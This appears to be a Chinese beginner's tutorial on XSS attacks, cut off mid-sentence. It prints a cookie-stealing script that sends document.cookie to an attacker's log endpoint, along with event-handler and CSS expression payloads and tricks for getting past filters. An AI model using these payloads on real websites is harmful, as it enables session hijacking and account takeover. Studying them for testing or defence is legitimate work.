脚本安全与防范初探.docVIP

XSS跨站脚本攻击初探 XSS跨站脚本攻击的基本原理和SQL 注入攻击类似（个人观点），都是利用系统执行了未经过滤的危险代码，不同点在于XSS是一种基于网页脚本的注入方式，也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的，属于客户端攻击。  XSS跨站脚本攻击的基本原理和SQL 注入攻击类似（个人观点），都是利用系统执行了未经过滤的危险代码，不同点在于XSS是一种基于网页脚本的注入方式，也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的，属于客户端攻击。而SQL注入攻击将危险代码绕过正常的文本输入变为可执行的SQL执行语句从而操纵数据库，从而进一步探测、操纵数据库信息。属于服务器攻击？（菜鸟看法）。 XSS攻击前奏（XSS bug 检测） 1、最常见的最经典的XSS bug检测语句必然是 scriptalert(/XSS/)/script??????????????????????????????????????? ① 比如在存在XSS bug的留言板上写上留言①,当访问留言板网页时会弹出对话框: 这表明我们输入的语句被原样写入的网页并被浏览器执行了.那么我们就有机会执行我们的脚本攻击载荷: script src = /xssbug.js/script 在我们的网络空间上的xssbug.js代码可以是 Var img = document.createElement(“img”); Img.src = “/log?”+escape(document.cookie); document.body.appendChild(img); 如果我们如上代码顺利执行,那么被攻击者在目标网站的登录cookie就写进了log.得到其cookie后,进行浏览器重新发包就可以以被攻击者身份登录目标网站.(被攻击者可以是普通用户也可以使网站超级管理员). 将窃取cookie的代码换成下载者地址就可以将下载者下载到存在下载者攻击漏洞的用户电脑上. 也可以将代码换成目标用户在网站上的某些操作的 数据包脚本.促使在不知情的情况下”自愿”进行某些操作. 对于Cookie窃取的防御可以使ＩＰ绑定等方案了． 既然存在ＸＳＳ攻击那么程序员在开发时必然会进行某些危险关键字的过滤，以及限制用户的输入长度．这样即使存在ｘｓｓ漏洞．Ｈａｃｋ也只能检测，却不能够写入攻击载荷（长度限制啊）． 2、利用IMG图片标记属性跨站 当然也可以像上面所说的在留言板中输入 img src=”javacript:alert(/XSS/)”/img 这所说的不是这样是在用户上传图片时将图片路径修改为一段可执行的XSS测试脚本. 如果存在XSS漏洞那么此类脚本就会被执行.这类脚本要闭合双引号””等. 利用DIV标签属性跨站 div style=”width:0;height:0;background:url(javascript:document.body.onload = function(){alert(/XSS/);};”/div 利用已知事件攻击 移动特效字marquee文字/marquee marquee onstart=”alert(/XSS/)”文字/marquee B.div style=”” onmouseenter=”alert(/XSS/)”文字/div 构造事件 img style=”#” style=”TEST:e-xpression(alert(/XSS/));” 常用的事件构造 font style = “TEST:e-xpression(alert(/XSS/))”/font li style = “TEST:e-xpression(alert(/XSS/))”/li table style = “TEST:e-xpression(alert(/XSS/))”/table a style = “TEST:e-xpression(alert(/XSS/))”/a b style = “TEST:e-xpression(alert(/XSS/))”/b ul style = “TEST:e-xpression(alert(/XSS/))”/ul marque tyle = “TEST:e-xpression(alert(/XSS/))”/marquee 3、突破程序员的过滤限制 利用javascript换行与空格突破过滤 img src = j ava script:al er t(/XSS/)///空格使用Tab键产生 img src = j ava script :a ler t(/xss/) 利用注释img src = “#”/**/onerror = alert(/XSS/) 转代码,绕过滤 使用大小写转换绕过过